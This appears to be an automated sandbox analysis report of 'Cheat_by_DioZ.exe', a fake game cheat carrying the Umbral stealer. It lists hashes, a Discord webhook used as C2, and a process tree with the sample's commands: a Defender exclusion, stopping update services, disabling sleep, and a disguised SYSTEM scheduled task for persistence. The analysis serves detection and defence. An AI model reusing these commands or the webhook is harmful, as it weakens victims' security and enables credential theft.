Analysis

  • max time kernel
    23s
  • max time network
    81s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/08/2023, 15:29

General

  • Target

    Cheat_by_DioZ.exe

  • Size

    15.3MB

  • MD5

    7e8d421582aacc3651a5f8ae391e4605

  • SHA1

    0cff4ece5e75a5dc0c5e6076ad782ecf42ad7c16

  • SHA256

    a85235b38f90be244eb57d131951ff69a562714221d640ab9da0480af4aed06c

  • SHA512

    7eb24ed0bddb9a681c231c92c50b52015b09466262dbdf1c1e47219f4fe76cff9adf65860d2c03cf61e8d4e7aa7ee46a7a81464773c56a81fee4a2ebec8192f1

  • SSDEEP

    196608:0KMurhe046YIw782LRg5lA7B+juGhgdKDW/vDhoOocQ4cfVqwc7Mzg:0hurhf4Qm8MR8gwRh+n/lvoPDc70

Score
10/10

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1143115606330200074/pyKgc8H0hMiolN7TnRv_a5UZxMEV9hMyMPcyMEE79xLCjkKRbFA2ce8qYJuxmfb_M-83

Signatures

  • Detect Umbral payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:408
      • C:\Users\Admin\AppData\Local\Temp\Cheat_by_DioZ.exe
        "C:\Users\Admin\AppData\Local\Temp\Cheat_by_DioZ.exe"
        2⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Users\Admin\AppData\Local\Temp\3S.exe
          "C:\Users\Admin\AppData\Local\Temp\3S.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1084
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4980
        • C:\Users\Admin\AppData\Local\Temp\MS.exe
          "C:\Users\Admin\AppData\Local\Temp\MS.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:428
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4696
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:432
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1628
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1324
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4976
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:2896
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1156
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
            PID:2040
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            3⤵
              PID:4912
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-ac 0
              3⤵
                PID:2780
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                3⤵
                  PID:1768
              • C:\Windows\System32\dialer.exe
                C:\Windows\System32\dialer.exe
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:968
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cnxaozlt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5020
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -pss -s 460 -p 1020 -ip 1020
              1⤵
                PID:2060
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1020 -s 3620
                1⤵
                • Program crash
                PID:3520

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                d28a889fd956d5cb3accfbaf1143eb6f

                SHA1

                157ba54b365341f8ff06707d996b3635da8446f7

                SHA256

                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                SHA512

                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

              • C:\Users\Admin\AppData\Local\Temp\3S.exe

                Filesize

                227KB

                MD5

                0c6f57e34c60e926869925974c0ba0c6

                SHA1

                c2c96e1a4da5fe008796801569ebdfcde4d3c07b

                SHA256

                3818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71

                SHA512

                70281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193

              • C:\Users\Admin\AppData\Local\Temp\3S.exe

                Filesize

                227KB

                MD5

                0c6f57e34c60e926869925974c0ba0c6

                SHA1

                c2c96e1a4da5fe008796801569ebdfcde4d3c07b

                SHA256

                3818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71

                SHA512

                70281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193

              • C:\Users\Admin\AppData\Local\Temp\3S.exe

                Filesize

                227KB

                MD5

                0c6f57e34c60e926869925974c0ba0c6

                SHA1

                c2c96e1a4da5fe008796801569ebdfcde4d3c07b

                SHA256

                3818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71

                SHA512

                70281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193

              • C:\Users\Admin\AppData\Local\Temp\MS.exe

                Filesize

                9.9MB

                MD5

                ed1da88dca5699f9e01a7e4fa08be78c

                SHA1

                1cc67cbe8cf95217bd7f22a1e30702bf9d45e806

                SHA256

                9773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413

                SHA512

                4e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef

              • C:\Users\Admin\AppData\Local\Temp\MS.exe

                Filesize

                9.9MB

                MD5

                ed1da88dca5699f9e01a7e4fa08be78c

                SHA1

                1cc67cbe8cf95217bd7f22a1e30702bf9d45e806

                SHA256

                9773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413

                SHA512

                4e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfljcb2d.50m.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/428-261-0x0000024A72C20000-0x0000024A72C30000-memory.dmp

                Filesize

                64KB

              • memory/428-274-0x00007FF9BE400000-0x00007FF9BEEC1000-memory.dmp

                Filesize

                10.8MB

              • memory/428-271-0x0000024A72C20000-0x0000024A72C30000-memory.dmp

                Filesize

                64KB

              • memory/428-258-0x0000024A72B90000-0x0000024A72BB2000-memory.dmp

                Filesize

                136KB

              • memory/428-259-0x00007FF9BE400000-0x00007FF9BEEC1000-memory.dmp

                Filesize

                10.8MB

              • memory/428-260-0x0000024A72C20000-0x0000024A72C30000-memory.dmp

                Filesize

                64KB

              • memory/512-315-0x00007FF99C4F0000-0x00007FF99C500000-memory.dmp

                Filesize

                64KB

              • memory/512-313-0x000001C550960000-0x000001C550987000-memory.dmp

                Filesize

                156KB

              • memory/512-329-0x000001C550960000-0x000001C550987000-memory.dmp

                Filesize

                156KB

              • memory/584-298-0x00007FF99C4F0000-0x00007FF99C500000-memory.dmp

                Filesize

                64KB

              • memory/584-294-0x000001B1FBF60000-0x000001B1FBF81000-memory.dmp

                Filesize

                132KB

              • memory/584-297-0x000001B1FBF90000-0x000001B1FBFB7000-memory.dmp

                Filesize

                156KB

              • memory/584-319-0x00007FF9DC50C000-0x00007FF9DC50D000-memory.dmp

                Filesize

                4KB

              • memory/584-318-0x00007FF9DC50F000-0x00007FF9DC510000-memory.dmp

                Filesize

                4KB

              • memory/584-311-0x00007FF9DC50D000-0x00007FF9DC50E000-memory.dmp

                Filesize

                4KB

              • memory/672-303-0x00007FF99C4F0000-0x00007FF99C500000-memory.dmp

                Filesize

                64KB

              • memory/672-299-0x0000023819E70000-0x0000023819E97000-memory.dmp

                Filesize

                156KB

              • memory/672-320-0x0000023819E70000-0x0000023819E97000-memory.dmp

                Filesize

                156KB

              • memory/724-325-0x0000026032F90000-0x0000026032FB7000-memory.dmp

                Filesize

                156KB

              • memory/724-328-0x00007FF99C4F0000-0x00007FF99C500000-memory.dmp

                Filesize

                64KB

              • memory/944-306-0x000001FD4E1A0000-0x000001FD4E1C7000-memory.dmp

                Filesize

                156KB

              • memory/944-310-0x00007FF99C4F0000-0x00007FF99C500000-memory.dmp

                Filesize

                64KB

              • memory/944-321-0x000001FD4E1A0000-0x000001FD4E1C7000-memory.dmp

                Filesize

                156KB

              • memory/968-278-0x00007FF9DADF0000-0x00007FF9DAEAE000-memory.dmp

                Filesize

                760KB

              • memory/968-308-0x00007FF62B0A0000-0x00007FF62B0C9000-memory.dmp

                Filesize

                164KB

              • memory/968-277-0x00007FF9DC470000-0x00007FF9DC665000-memory.dmp

                Filesize

                2.0MB

              • memory/1020-323-0x000001468FA10000-0x000001468FA37000-memory.dmp

                Filesize

                156KB

              • memory/1020-307-0x000001468FA10000-0x000001468FA37000-memory.dmp

                Filesize

                156KB

              • memory/1020-326-0x00007FF9DC50D000-0x00007FF9DC50E000-memory.dmp

                Filesize

                4KB

              • memory/1084-250-0x00007FF9BE400000-0x00007FF9BEEC1000-memory.dmp

                Filesize

                10.8MB

              • memory/1084-195-0x00000215A7830000-0x00000215A7870000-memory.dmp

                Filesize

                256KB

              • memory/1084-252-0x00000215A7C30000-0x00000215A7C40000-memory.dmp

                Filesize

                64KB

              • memory/1084-256-0x00007FF9BE400000-0x00007FF9BEEC1000-memory.dmp

                Filesize

                10.8MB

              • memory/1844-257-0x00007FF72B2B0000-0x00007FF72BCAD000-memory.dmp

                Filesize

                10.0MB

              • memory/1844-302-0x00007FF72B2B0000-0x00007FF72BCAD000-memory.dmp

                Filesize

                10.0MB

              • memory/1984-133-0x0000000000400000-0x000000000135C000-memory.dmp

                Filesize

                15.4MB

              • memory/5020-280-0x00007FF9BE400000-0x00007FF9BEEC1000-memory.dmp

                Filesize

                10.8MB

              • memory/5020-293-0x000001B327100000-0x000001B327110000-memory.dmp

                Filesize

                64KB

              • memory/5020-281-0x000001B327100000-0x000001B327110000-memory.dmp

                Filesize

                64KB

              • memory/5020-282-0x000001B327100000-0x000001B327110000-memory.dmp

                Filesize

                64KB